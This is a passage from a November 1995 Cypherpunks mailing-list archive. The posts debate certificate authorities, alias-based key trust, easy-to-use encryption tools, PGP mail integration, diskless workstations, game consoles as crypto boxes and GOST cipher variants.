I am far behind in my C'punks reading and am likely to get farther behind before I catch up, so perhaps this is well-known or dated. However, the recent revival of reputation discussion reminded me of a very interesting claim made by Miller & Drexler in "Comparative Ecology: A Computational Perspective" (http://www.webcom.com/~agorics/agorpapers.html). I'll quote from section 4:

> ... Trademarking of services and products enables producers to establish
> valuable reputations. The lack of this mechanism in biology [17]
> contributes to the relative sparseness of symbiosis there.

> 4.4. Food webs and trade webs

> Biological and market ecosystems both contain a mixture of symbiotic and
> negative-sum relationships. This paper argues that biological ecosystems
> involve more predation, while idealized market ecosystems involve more
> symbiosis. Indeed, one can make a case that this is so even for human
> market ecosystems-that biological ecosystems are, overall, dominated by
> predation, while market ecosystems are, overall, dominated by symbiosis.

> In human markets (as in idealized markets) producers within an industry
> compete, but chains of symbiotic trade connect industry to industry.
> Competition in biology likewise occurs most often among those occupying
> the same niche, but here, it is predation that connects from niche to
> niche.
> Because of the lack of reputations and trademarks, symbiosis in
> biology occurs most often in situations where the "players" find
> themselves in a highly-iterated game. In the extreme, the symbiotic
> system itself becomes so tightly woven that it is considered a single
> organism-as with lichens composed of fungi and algae, or animals
> composed of eukaryotic cells containing mitochondria. Predation, of
> course, links one symbiotic island to the next.

> Ecology textbooks show networks of predator-prey relationships-called
> food webs-because they are important to understanding ecosystems;
> "symbiosis webs" have found no comparable role. Economics textbooks show
> networks of trading relationships circling the globe; networks of
> predatory or negative-sum relationships have found no comparable role.
> (Even criminal networks typically form cooperative "black markets".) One
> cannot prove the absence of such spanning symbiotic webs in biology, or
> of negative-sum webs in the market; these systems are too complicated
> for any such proof. Instead, the argument here is evolutionary: that the
> concepts which come to dominate an evolved scientific field tend to
> reflect the phenomena which are actually relevant for understanding its subject matter.

> [17] Wickler, Wolfgang, Mimicry in Plants and Animals (World University Library/ McGraw-Hill, New York, 1968).

This collection of Miller&Drexler papers is very much worth reading if you haven't run across it yet.

Ted

From fletch at ain.bls.com Tue Nov 28 07:21:18 1995
From: fletch at ain.bls.com (Mike Fletcher)
Date: Tue, 28 Nov 1995 23:21:18 +0800
Subject: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <9511281504.AA26594@outland>

Hi fellow PSX owner! Tried WipEouT yet? :)

> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

For those who don't know, the PSX is a CD based gaming console released (in the US) in Sept by Sony. It's a MIPS R3000/25MHz processor with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

As for serial port, why bother with the game port when there's a serial I/O port on the back (the link cable that lets you hook two PSXen up to play head to head (Mmmmm, Destruction Derby)).

What would be _really_ spiffy would be for Sony (or a 3rd party) to put out a "hack disk" (for lack of a better name) that would have a bare bones kernel that you could then download stuff from another platform (gcc cross-compiled from your linux box for example). Like that'll happen.

The line between toy and real machine is getting more and more fuzzy (we use a box here at work with the same processor to compile for an AT&T telephony switch (which tells you how sad the AT&T product is :) :))). How long until the NSA tries a Chinese Lottery attack hidden inside a Nintendo cart?

Ah well, I've rambled enough.

---
Fletch __`'/|
fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______
404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------

From rajaram at morgan.com Tue Nov 28 07:39:54 1995
From: rajaram at morgan.com (P. Rajaram)
Date: Tue, 28 Nov 1995 23:39:54 +0800
Subject: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <9511281004.ZM4257@morgan.com>

On Nov 27, 4:46pm, Jeff Weinstein wrote:
> Subject: Re: Certificate Authorities?
> If you want a static list of CAs that netscape products
> will accept, you will be disappointed.
> In the future
> there will be more commercial CAs, many companies will run
> their own internal CAs, and information providers will
> provide certs to their subscribers to handle access
> control to their sites. It is a losing battle to try
> to maintain a static list of CAs. IMHO, Going with a more
> dynamic, user configurable approach is the only way to
> keep up.

Yes. But... I deal with the security infrastructure for a large corporation. I want only security administrators to configure the list of acceptable CAs. I specifically do not want our users to be able to add new CAs to the list of trusted "approved" CAs.

The concern is that some users who are not crypto enthusiasts may be "social engineered" into adding a very liberal CA to their list. Once this happens, the browser's signature verification capability is totally compromised.

This is one of the reasons why PGP has not been adopted by many large companies. In response, Viacrypt now seems to have a product that can restrict user modifications to the public keyring.

-raj

From cme at TIS.COM Tue Nov 28 08:11:06 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 29 Nov 1995 00:11:06 +0800
Subject: Intelligence Community Massive Digital Data Systems Initiative
In-Reply-To: <199511272333.PAA12647@comsec.com>
Message-ID: <9511281542.AA09773@tis.com>

I think the real capacity measure is the number of satellite surveillance images per day -- at their high resolution. Anyone know that resolution?

- Carl

From ecarp at netcom.com Tue Nov 28 08:13:40 1995
From: ecarp at netcom.com (Ed Carp)
Date: Wed, 29 Nov 1995 00:13:40 +0800
Subject: The future will be easy to use (fwd)
Message-ID: <199511281653.KAA23530@khijol>

> To: stevenw at best.com (Steven Weller)
> Cc: cypherpunks at toad.com
> Subject: Re: The future will be easy to use (fwd)
> Reply-to: perry at piermont.com
> Date: Tue, 28 Nov 1995 08:29:10 -0500
> From: "Perry E.
Metzger"
>
> Steven Weller writes:
> > >Realistically, who in their right mind would buy a diskless workstation to
> > >connect to Internet?
> >
> > The same sort of things could be said of the telephone compared with
> > written correspondence. Why would anyone have one in their business or
> > home? Anyone can overhear a conversation, people will just chat, the only
> > thing you can do with it is talk, there is no record of the correspondence,
> > why would anyone want to talk to people on the other side of town? etc.
>
> This is different. In an era of distributed processing, they are
> returning you to the mainframe model. I don't see that this can work
> very well. Considering how much more powerful a $1000 machine is, why
> would you want something half that price that can do one hundredth as
> much for you?

I beg to differ. Even though Larry Ellison's idea is silly, I don't see it as returning us to the mainframe model. Rather, I see it as just a small step backwards. Right now, I've got a 486/DX2-66 with a paltry 50 MB HD on my desk at work. Most of its processing is done loading stuff off the LAN and running it locally. The fact that I have a local disk makes not the slightest bit of difference except at boot-time.

If the diskless workstation were to have *no* intelligence whatsoever, I'd agree with you. As to diskless workstations being of no value, again, I'd have to disagree. Diskless workstations, especially X terminals that have a little NVRAM in them, have been rather popular for several years as a way to get graphical objects onto people's desks without having to shell out a ton of money in the process. The only reason that they're getting less popular is that PC prices have fallen dramatically for the past several years, so much so that it's cost-effective to put a DX2-66 with 8 MB of RAM and a little disk (or no disk at all) on someone's desktop as opposed to something from Network General.
Me, I'm waiting for the day that someone gets clever and puts Linux into ROM. :)

Java is starting to get really hot, so much so that I was telling my spouse that if she wanted to learn Java, she'd have steady contracts in the next year or so, even in the sticks of Dallas ;) The point is, the market for a cheap, fast PC that will run applets *is* there, or will be soon. I only hope that they make it upgradeable, so *I* can put that 5 GB array on it, and beef up the memory without having to take a second mortgage to do it.

From ecarp at netcom.com Tue Nov 28 08:20:02 1995
From: ecarp at netcom.com (Ed Carp)
Date: Wed, 29 Nov 1995 00:20:02 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511281657.KAA23689@khijol>

Anyone done anything regarding PGP hooks into Pegasus Mail? I'm running it at home now (SLIPped into my Linux box), and I'd like to find a way to integrate PGP into Pegasus Mail.

Thanks in advance for any replies...
--
Ed Carp

From jya at pipeline.com Tue Nov 28 08:50:29 1995
From: jya at pipeline.com (John Young)
Date: Wed, 29 Nov 1995 00:50:29 +0800
Subject: NAV_dat
Message-ID: <199511281635.LAA13666@pipe3.nyc.pipeline.com>

Zero Kelvin crypto but The NYPaper hisses 28 Nov:

The US Navy is starting to release a treasure trove of physical data about the sea that was gathered in secrecy during the long decades of the cold war, exciting scientists who see it as a bonanza for understanding environmental change. Over the decades, the Navy deployed thousands of ships, airplanes, submarines and satellites to collect such data. Usually kept secret, the archival readings are seen as unrivaled yardsticks for judging long-term processes of global climatic change and planetary warming. A geophysicist said the value of that data for scientific and commercial exploitation is measured in billions of dollars.
"Scientific Utility of Naval Environmental Data," a June, 1995, 52-page appraisal by the Medea scientific advisory group, is available for free by telephoning (703) 883-5265 voice or (703) 883-6190 fax.

NAV_dat (13 kb)

From lharrison at mhv.net Tue Nov 28 09:52:28 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Wed, 29 Nov 1995 01:52:28 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <9511281715.AA23370@mhv.net>

At 09:52 AM 11/28/95 +0000, you wrote:
>Anyone done anything regarding PGP hooks into Pegasus Mail? I'm
>running it at home now (SLIPped into my Linux box), and I'd like to
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...

Ed - I haven't heard of anything re: "PGP hooks into Pegasus Mail". At one time, Eudora and ViaCrypt were discussing it but, from what I heard, those discussions fizzled out. The easiest way to *integrate* is to use a front end program.

Regards - Lynne

*******************************************************
Lynne L. Harrison, Esq. | "The key to life:
Poughkeepsie, New York  |  - Get up;
E-mail:                 |  - Survive;
lharrison at mhv.net    |  - Go to bed."
*******************************************************

From JonathanZ at consensus.com Tue Nov 28 09:52:33 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Wed, 29 Nov 1995 01:52:33 +0800
Subject: The future will be easy to use
Message-ID:

At 10:56 PM 11/26/95, James A. Donald wrote:
>At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
>> it
>> means forming a group, made up of Cypherpunk members perhaps, but much
>> smaller, and capable of working together. Also capable of handling not only
>> the theory, but good solid code, GUI, PR, meetings, talking to the
>> government, etc.
>
>Skip the talking to the government bit: Ignore, do not confront.

I can't agree. The model of a successful enterprise includes feedback from different levels of participants. Regardless, the government will be taking a role in encryption.
Thus even if they aren't a defining part of the development, bringing them to a limited extent into the loop, and finding even small areas which the government would support, helps provide better buy-in by the government officials who participate, helping the momentum.

The point isn't to bring them into the design, but simply to use their feedback to optimize our PR approach.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick Consensus Development Corporation..
.. 1563 Solano Ave, #355..
.. Berkeley, CA 94707-2116..
.. o510/559-1500 f510/559-1505..
..Mosaic/WWW Home Page: ..
.. Consensus Home Page ..

From perry at piermont.com Tue Nov 28 10:11:06 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 02:11:06 +0800
Subject: The future will be easy to use
In-Reply-To:
Message-ID: <199511281726.MAA00314@jekyll.piermont.com>

Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except by their own desire to interfere.

> Regardless, the government will be taking a role in encryption.

What makes you say that? Besides, why would that be desirable on any level?

The Government will try to set standards and we will ignore them until they try to force them on us by law, period.

Perry

From EALLENSMITH at ocelot.Rutgers.EDU Tue Nov 28 10:32:01 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Wed, 29 Nov 1995 02:32:01 +0800
Subject: The future will be easy to use
Message-ID: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>

From: IN%"raph at c2.org" "Raph Levien" 27-NOV-1995 17:11:37.38

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter Gutmann, and others have proved themselves quite capable of writing good solid code. Sameer Parekh has done an incredible job with PR.
Phil Karn, Dan Bernstein, and some others (who I'm not sure want to be named) are talking to the government. GUI I'm less sure about, but I'd hope that some cpunks would come out of the woodwork.
------------------
If you'd like a non-programmer user to test out the user interface, I'm available to some degree if it's usable on a VAX (and to a lesser degree for MS-DOS). Given the number of people like me who are interacting using a non-GUI interface for various reasons (including using a mainframe for email), I would suggest not making it specifically GUI-dependent.

-Allen

From EALLENSMITH at ocelot.Rutgers.EDU Tue Nov 28 10:33:58 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Wed, 29 Nov 1995 02:33:58 +0800
Subject: Bitbux could eliminate some domestic currencies?
Message-ID: <01HY6DKHWT5S8WYPWJ@mbcl.rutgers.edu>

From: IN%"frantz at netcom.com" 27-NOV-1995 02:55:15.66

Gresham's law says that the bad money drives the good money out of circulation. Does this mean that real cash is better than ecash ;-).
------------------
You may realize this (due to the smiley), but what Gresham's law says is that hard to distinguish bad money drives good money out of circulation. If something is distinguishable, then it works the other way around (see the replacement of the ruble by the dollar in pre-modern Russia, for instance).

-Allen

From JonathanZ at consensus.com Tue Nov 28 10:41:26 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Wed, 29 Nov 1995 02:41:26 +0800
Subject: The future will be easy to use
Message-ID:

At 9:26 AM 11/28/95, Perry E. Metzger wrote:
>Jonathan Zamick writes:
>> I can't agree. The model of a successful enterprise includes feedback from
>> different levels of participants.
>
>This isn't an enterprise. The government is not a participant except
>by their own desire to interfere.
>
>> Regardless, the government will be taking a role in encryption.
>
>What makes you say that?
Besides, why would that be desirable on any >level? > >The Government will try to set standards and we will ignore them until >they try to force them on us by law, period. This discussion was based on a group of people getting together to create a new easy to use package for handling keys and such. The government is going to try to take a dominant stance, and mandate elements of it. That has to be assumed. Those elements we don't agree with will be ignored or worked around (depending if its government opinion or government law.) However, it is possible, even in an antagonistic relationship, to develop positive feedback. I may be cracked, but I'd like to think that it would be an advantage to find some area where the government and the Cypherpunk members do agree, to minimize the conflict over the areas where we don't. Still, this is getting past the original topic, and gets more into the religious level of whether there can be any cooperation when the two sides are Government and Good/Widespread Encryption. My stance is that currently, no, but that doesn't preclude it in the future. Others don't see it happening at all, or don't see it worth the investment to achieve. That is perfectly valid. --- Returning to the original topic though, do we want to get a smaller list together to spec out some ideas for the project that was discussed? A simple, transparent, tool which would allow people to use strong encryption without having to think about it? I don't have much time to contribute right now, but I can at least put together the list, and some ideas. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From perry at piermont.com Tue Nov 28 10:41:36 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Wed, 29 Nov 1995 02:41:36 +0800 Subject: The future will be easy to use In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu> Message-ID: <199511281748.MAA00358@jekyll.piermont.com> "E. ALLEN SMITH" writes: > Phil Karn, Dan Bernstein, and some others (who I'm not sure want to > be named) are talking to the government. If you call lawsuits "talking", not that talking is important. .pm From EALLENSMITH at ocelot.Rutgers.EDU Tue Nov 28 10:51:34 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Wed, 29 Nov 1995 02:51:34 +0800 Subject: The future will be easy to use Message-ID: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu> From: IN%"perry at piermont.com" 28-NOV-1995 12:49:12.47 "E. ALLEN SMITH" writes: > Phil Karn, Dan Bernstein, and some others (who I'm not sure want to > be named) are talking to the government. If you call lawsuits "talking", not that talking is important. ----------------- Umm... I wasn't the one that wrote that. It was included in the message to which I was replying. -Allen From perry at piermont.com Tue Nov 28 10:52:12 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 29 Nov 1995 02:52:12 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: <199511281801.NAA00386@jekyll.piermont.com> Jonathan Zamick writes: > This discussion was based on a group of people getting together to create > a new easy to use package for handling keys and such. The government is > going to try to take a dominant stance, and mandate elements of it. So we can ignore them. Big deal. They have no laws with which to enforce their desires. > However, it is possible, even in an antagonistic relationship, to develop > positive feedback. Who cares? An hour spent talking to an idiot from Washington is better spent writing good code unless there is a law pending in congress, in which case you are probably better off paying someone who knows what they are doing to do the talking for you.
> Returning to the original topic though, do we want to get a smaller list > together to spec out some ideas for the project that was discussed? A > simple, transparent, tool which would allow people to use strong encryption > without having to think about it? You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not Photuris, although I'll be trying to port Aggelos Keromytis' version at some point) on my laptop at the IETF meeting in Dallas (provided that I can buy a laptop in time.) There are three things we are currently missing in the architecture, IMHO. 1) We need a certificate system to replace X.509 and that plays nicely with distributed databases. 2) We need to implement the Eastlake/Kaufman method for embedding certificates in the DNS or something similar. 3) We need a good entity naming model. Given all those being implemented, sometime soon I can see people telnetting or ftping hither and thither without ever noticing or caring that their sessions are completely encrypted. We also have the following need: 4) A good MIME mailer (that looks like NeXT Mail or something like it) which has hooks for something MOSSlike that uses the same certificate infrastructure described in 1-3 above. 5) SHTTP capable browsers that also use 1-3 listed above. .pm From perry at piermont.com Tue Nov 28 10:52:33 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 29 Nov 1995 02:52:33 +0800 Subject: The future will be easy to use In-Reply-To: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu> Message-ID: <199511281802.NAA00401@jekyll.piermont.com> I apologize. your inclusion style is unusual and confused me. "E. ALLEN SMITH" writes: > From: IN%"perry at piermont.com" 28-NOV-1995 12:49:12.47 > > "E. ALLEN SMITH" writes: > > Phil Karn, Dan Bernstein, and some others (who I'm not sure want to > > be named) are talking to the government. > > If you call lawsuits "talking", not that talking is important. > ----------------- > Umm... I wasn't the one that wrote that. 
It was included in the > message to which I was replying. > -Allen > From cme at TIS.COM Tue Nov 28 11:00:20 1995 From: cme at TIS.COM (Carl Ellison) Date: Wed, 29 Nov 1995 03:00:20 +0800 Subject: The future will be easy to use In-Reply-To: <199511280009.QAA12863@comsec.com> Message-ID: <9511281803.AA20521@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Mon, 27 Nov 1995 11:06:13 -0800 (PST) >From: Raph Levien > From this perspective, let's take a look at the recent thread on >"establishing trust." Carl Ellison advocates the MOSS alias system. My >understanding of this system is that individual users associate "aliases" >with public keys. If done right, it can work well. However, from a >usability perspective, it is just one more trouble spot. Yes, it could easily be done wrong in such a way that the user gets confused rather than helped; burdened rather than relieved. I advocate aliases because that's how *I* think. I think in words so I assign my own names (aliases) for the people who populate my mental model of the world. By definition, these are all my correspondents. It's possible of course that some other people (of different Myers-Briggs type, perhaps) think differently -- not in words or aliases. If that's true, we should find out how they think and associate the right thing for them. For example, I had a friend (a painter/sculptor) who thought in images. She might prefer to use little pictures or icons (of her own drawing) as the aliases. > First, on what basis will users decide which keys are worthy of being >assigned which aliases? Public keys are big hunks of base64 encoded >gibberish. They are difficult to present in a user interface, difficult >to communicate in alternate, known secure channels (such as telephone >calls and face to face communication). There is no way that a person >could memorize one. That's true.
What the user would have to see is some icon (or, for text-bound folks, a temporary unique string) until the user chooses and assigns the appropriate alias. That icon would have no meaning by itself. It would acquire a meaning by being associated with some message or set of messages: a) an attribute testimony (signed by someone with known authority to specify such an attribute -- the equivalent of a certificate) b) a set of messages signed by the key in question (tying the key to the source material from which the user formed his/her impression of the sender) I, the user, would want to be able to call up the set of defining messages for any key or alias at any time in the future -- just in case I get so many aliases that I forget who one belongs to. > The other issue is how much time and energy the user has to spend >keeping the alias database up to date. There is no way to communicate >securely with anyone who's not in the database. If the user is >communicating with a large number of people, then it's very tempting to >get sloppy. I keep a fairly large database of aliases already, in my .mailrc on UNIX. Eudora permits a similar DB. So do a number of other mailers. Users must be demanding this feature and using it. All I say we have to add to that is protection from tampering. > There's no way around it. This kind of system will not make it in the >big time. I wouldn't be so quick to dismiss it. > As I see it, any system that does must have the following >properties: > > * Some variant on the Web of Trust. Of course -- you have to have some means for communicating and recording attributions (that the person who owns a key is allowed to spend money on a given bank account; that the person who owns a key goes by the name Carl or receives mail at cme at acm.org; that the person who owns a key is a trusted developer of PGP; ...). > * Online key-servers for getting keys in real time. > * A clean mechanism for validating keys through alternate channels. 
These two have to go together -- but I'm curious what anyone means by "validating keys". I see this as the flaw killing certificate structures like X.509 or PGP's. [Even Steve Kent, a major X.509 advocate, seems to see this problem (with sadness, in his case).] I had a secretary once, long ago. I would drive her home from work occasionally -- or to parties -- when her husband wasn't around or wasn't interested in going someplace. One time, in passing, he noted that this arrangement was OK with him because he "trusted her". I trusted her, too. I knew her to be having affairs with various people (not me at the time) but he didn't. So we each trusted her but what we trusted her to be was different. Just saying that we trusted her wasn't saying anything. As soon as you qualify the "validated key" (e.g., to be allowed to spend money, etc.), you get to the signed attributes which I advocate over certificates. If all you do with the validated key is tie it to a text string which purports to specify a human being, as X.509 or PGP do, you haven't done anything for me. If all humans had unique names, then this might mean something to me (assuming I knew the human in question and knew his unique name). However, that's what killed X.509 -- the need for unique names. We don't have them and we're not about to adopt some new social structure which assigns them. Even if we did all adopt unique names, you postulated a *large* set of people to communicate with -- larger than my immediate circle of acquaintances, presumably -- so even a unique name would be meaningless to me because I would not have met the person in question. If the unique name certificate works at all it's because I have some mechanism (not mentioned in the certificate hierarchy design) for attaching attributes to the named person. However, if I haven't met the person in question, I don't have that mechanism already and it needs to be created alongside the certificate mechanism. 
I don't need testimony about the name (unique or otherwise) of the person who owns that key. I need testimony about the attributes of that person (PGP developer; fellow Cypherpunk; FBI agent; undercover NSA plant; permission to use a checking account; receives mail at xxx at yyy.com; ...). That testimony can be provided by referencing the key itself, rather than some (artificially unique) name which exists only to link the attribute to the key. The S/W which links these together and lets me find the various testimonies for a key has to be convenient -- but that was your original point and I concur. I object only to the implication that current certificate hierarchy thinking gets us closer to that goal than the direct signed attribute statements would. > There are three possible outcomes: we build it, the NSA builds it, or >Microsoft/Netscape builds it. This last outcome might not be so bad, but >only in the first one can we rely on our principles being advanced. Amen! - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. 
http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From adam at lighthouse.homeport.org Tue Nov 28 11:19:53 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Wed, 29 Nov 1995 03:19:53 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com> Message-ID: <199511281813.NAA12568@homeport.org> | > Well, signed Alice posts have shown up, so we will just have to assume | > that the above was a spoof and that the signed Alice posts are the | > real ones, now won't we? | | Perry. Normally I try my best to ignore you. | | But I will simply repeat, I have never signed a post, and have no | intention of beginning to sign any posts, until I establish a secure | machine in a secure complex that is dedicated to that purpose. When did PGP claim to be perfect? Its not; and the point is not to obtain 100% confidence in someone, but a useable level of confidence. If the remailer chains work, then it would be tough to find out who you are. If we do find out who you are, your integrity shell will tell you that your PGP binary was tampered with.
If we don't know who you are, then your machine is safe from just about anything other than a thorough sweep of all the net connected users in Canada. So, please explain the threat that causes you to think that 'pretty good' is worthless in this context. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From vwbug at iadfw.net Tue Nov 28 11:43:27 1995 From: vwbug at iadfw.net (Bill) Date: Wed, 29 Nov 1995 03:43:27 +0800 Subject: Who has the right to read your e-mail? Old hash, but I need to ask. Message-ID: <2.2b7.32.19951128125813.00679628@server.iadfw.net> A recent incident brought this up at work. If someone could point me to a site that would help explain the ins and outs of the laws regarding the following - Who has the right to read your personal e-mail. E-mail created at work? E-mail downloaded at work? E-mail stored on a PC at work? Thanks vwbug at iadfw.net From klong at phoenix.net Tue Nov 28 11:44:32 1995 From: klong at phoenix.net (Siberia) Date: Wed, 29 Nov 1995 03:44:32 +0800 Subject: PGP hooks for Pegasus Mail? Message-ID: <199511281905.NAA03947@phoenix.net> It is happening...about a week off from the first beta release. Announcements will be posted to the Pegasus mail support lists and bit.listserv.pmail (as well as other appropriate posting spots). >Anyone done anything regarding PGP hooks into Pegasus Mail? I'm >running it at home now (SLIPped into my Linux box), and I'd like to >find a way to integrate PGP into Pegasus Mail. > >Thanks in advance for any replies... > > Ed - Namaste' Kimberly Long klong at phoenix.net Standing on the bare ground...all mean egotism vanishes. I become a transparent eyeball; I am nothing; I see all; the currents of the Universal Being circulate through me; I am part or particle of God. ~Ralph Waldo Emerson )O( From perry at piermont.com Tue Nov 28 11:45:22 1995 From: perry at piermont.com (Perry E.
Metzger) Date: Wed, 29 Nov 1995 03:45:22 +0800 Subject: The future will be easy to use (fwd) In-Reply-To: Message-ID: <199511281329.IAA13468@jekyll.piermont.com> Steven Weller writes: > >Realisticaly, who in their right mind would buy a diskless workstation to > >connect to Internet? > > The same sort of things could be said of the telephone compared with > written correspondence. Why would anyone have one in their business or > home? Anyone can overhear a conversation, people will just chat, the only > thing you can do with it is talk, there is no record of the correspondence, > why would anyone want to talk to people on the other side of town? etc. This is different. In an era of distributed processing, they are returning you to the mainframe model. I don't see that this can work very well. Considering how much more powerful a $1000 machine is, why would you want something half that price that can do one hundredth as much for you? Perry From stewarts at ix.netcom.com Tue Nov 28 11:51:22 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 29 Nov 1995 03:51:22 +0800 Subject: [NOISE, sorta] Re: Inexpensive Crypto Boxes... Message-ID: <199511281935.LAA06806@ix11.ix.netcom.com> At 10:04 AM 11/28/95 -0500, Mike Fletcher wrote: > For those who don't know, the PSX is a CD based gaming console >released (in the US) in Sept by Sony. It's a MIPS R3000/25MHz processor >with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM. There are a number of reasonably powerful game machines under $300, though that uses TV-screen video, which isn't enough for decent text; doing a $500 machine with a real monitor should be quite possible. However, to make it functionally useful, it needs at least a connector for a a disk drive - couch potato web-surfers can skip it, but anybody who wants to do real work will spend the $100-300 to add a disk, and probably add a CD-ROM as well. 
Without a disk, you can't do off-line reading, which significantly affects anyone using pay-by-the-hour network access services. (I used to use a diskless Sun with 40 MB RAM on an Ethernet, and it was usually fine, but I was motivated by not wanting a fan on my computer...) ObCrypto - you _can_ do decent crypto on a diskless machine as long as you've got some non-volatile storage for keys; a few KB should do, and the main applications would have to run in ROM. > The line between toy and real machine is getting more and >more fuzzy (we use a box here at work with the same processor to compile >for an AT&T telephony switch (which tells you how sad the AT&T product >is :) :))). Telephone switches don't need high-power CPU-crunchers, and the R3000 was quite a decent processor. They need clean, stable CPUs and appropriately-designed operating systems which are good at controlling lots of polled I/O devices - it's a PDP-11 job, rather than a Cray job. Generally the OSs have been hand-rolled, though it's becoming much more practical to use Unix to develop user-interface applications now that processors are fast enough to have short interrupt times. The previous switches used Intel processors - 386s let you do more than 8086s, pulling applications into the CPU instead of low-level logic. >How long until the NSA tries a Chinese Lottery attack hidden >inside a Nintendo cart? You've read "The Hacker and the Ants", haven't you? :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From raph at c2.org Tue Nov 28 12:03:41 1995 From: raph at c2.org (Raph Levien) Date: Wed, 29 Nov 1995 04:03:41 +0800 Subject: The future will be easy to use In-Reply-To: <9511281803.AA20521@tis.com> Message-ID: On Tue, 28 Nov 1995, Carl Ellison wrote: > Raph Levien wrote: > > First, on what basis will users decide which keys are worthy of being > >assigned which aliases?
Public keys are big hunks of base64 encoded > >gibberish. They are difficult to present in a user interface, difficult > >to communicate in alternate, known secure channels (such as telephone > >calls and face to face communication). There is no way that a person > >could memorize one. > > That's true. What the user would have to see is some icon (or, for > text-bound folks, a temporary unique string) until the user chooses and > assigns the appropriate alias. That icon would have no meaning by itself. > It would acquire a meaning by being associated with some message or set of > messages: > > a) an attribute testimony (signed by someone with known authority to > specify such an attribute -- the equivalent of a certificate) This is the induction case, not the base case. It assumes that you've already got a bunch of trusted public keys in your database. It also assumes the willingness of the owners of those public keys to sign new keys. See, now they've got the same problem of trying to determine whether the key is valid. Turtles all the way down. > b) a set of messages signed by the key in question (tying the key to > the source material from which the user formed his/her impression > of the sender) There being no reason, of course, why Mallet couldn't just sign all that stuff with his own signature. Here, you're relying on the ability of data to authenticate itself. I am simply proposing a third alternative that has neither of these problems: a short unique name for the key. Its success relies on alternate, non-digital forms of communication: the phone, ink-signed paper, face to face, whatever. [complex stuff deleted - I only wanted to make a simple point] Raph From raph at c2.org Tue Nov 28 12:07:54 1995 From: raph at c2.org (Raph Levien) Date: Wed, 29 Nov 1995 04:07:54 +0800 Subject: The future will be easy to use In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu> Message-ID: On Tue, 28 Nov 1995, E.
ALLEN SMITH wrote: > If you'd like a non-programmer user to test out the user interface, I'm > available to some degree if it's usable on a VAX (and to a lesser degree for > MS-DOS). Given the number of people like me who are interacting using a non-GUI > interface for various reasons (including using a mainframe for email), I would > suggest not making it specifically GUI-dependant. Unfortunately, it's _way_ too early to recruit volunteers to test out the user interface. But thanks. Raph From wlkngowl at unix.asb.com Wed Nov 29 04:09:06 1995 From: wlkngowl at unix.asb.com (wlkngowl at unix.asb.com) Date: Wed, 29 Nov 95 04:09:06 PST Subject: GOST for sale Message-ID: <199511291310.HAA00198@UNiX.asb.com> On Mon, 27 Nov 1995 11:53:26 -0800, you wrote: >At 03:43 AM 11/24/95 +0100, Mats Bergstrom wrote: >>According to a short article in a Swedish newspaper (DN) >>with the title 'Spy Code of KGB can make computers safe', >>JETICO INC., located in Finland (Tammerfors), introduced >>a new crypto system on the world market last week. It's >>based on GOST, the Russian federal standard algorithm. [..] >From what I've read of GOST, it's really a family of cyphers with >different sets of S-boxes - routine military gets one set, top secret >gets another, civilian govt another, etc. Aside from possible >differences in security level for the S-boxes, one motivation is >that you can't take civilian govt decryptors and use them to read >or forge top secret military crypto, etc. If this is correct, >then some sets of S-boxes probably do have trapdoors (at least >susceptibility to differential 